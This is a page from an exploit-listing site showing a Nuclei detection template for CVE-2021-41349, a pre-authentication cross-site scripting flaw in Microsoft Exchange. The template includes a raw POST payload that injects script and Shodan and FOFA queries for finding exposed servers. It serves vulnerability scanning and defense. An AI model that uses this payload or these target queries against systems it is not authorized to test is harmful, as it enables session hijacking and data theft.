Materialized exploit
CVE-2021-41349
MEDIUM1 public exploit(s) for this CVE, 1 materialized with their code.
For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
Nuclei
medium Verified
Source
Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
By projectdiscovery
How to test this exploit
The Nuclei template IS the test: an executable detection rule. Install nuclei, then run it against a target you control.
nuclei -id CVE-2021-41349 -u https://your-target
Template yaml
id: CVE-2021-41349
info:
name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
remediation: |
Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-41349
epss-score: 0.93325
epss-percentile: 0.99831
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: exchange_server
shodan-query:
- vuln:cve-2021-26855
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query:
- title="outlook"
- icon_hash=1768726119
google-query: intitle:"outlook"
tags: cve,cve2021,xss,microsoft,exchange,vkev,vuln
http:
- raw:
- |
POST /autodiscover/autodiscover.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
matchers-condition: and
matchers:
- type: word
words:
- 'alert(document.domain);'
- 'a=""'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: word
negative: true
words:
- "A potentially dangerous Request.Form value was detected from the client"
- type: status
status:
- 500
# digest: 4a0a004730450220143a33b5d7b5eba73462976285b7bfe2789220f60c3c2146cbacae2ce1e8c41a0221008bd3aa4a7339629a658391e9fc632cc58ef8289f9acdef0937313dcc4ae86d23:922c64590222798bb761d5b6d8e72950